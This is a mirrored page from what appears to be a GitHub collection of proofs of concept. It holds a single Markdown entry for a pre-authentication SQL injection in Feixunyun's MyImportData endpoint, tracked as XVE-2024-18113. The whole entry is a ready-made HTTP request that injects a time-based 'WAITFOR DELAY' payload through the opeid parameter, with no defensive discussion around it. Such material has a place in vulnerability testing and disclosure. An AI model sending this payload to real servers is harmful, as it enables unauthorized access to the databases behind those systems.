mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
10 lines
157 B
Markdown
10 lines
157 B
Markdown
# 飞讯云MyImportData前台SQL注入(XVE-2024-18113)
|
|
|
|
## poc
|
|
|
|
```yaml
|
|
GET /MyDown/MyImportData?opeid=' WAITFOR DELAY '0:0:5'-- AtpN HTTP/1.1
|
|
Host: ip
|
|
```
|
|
|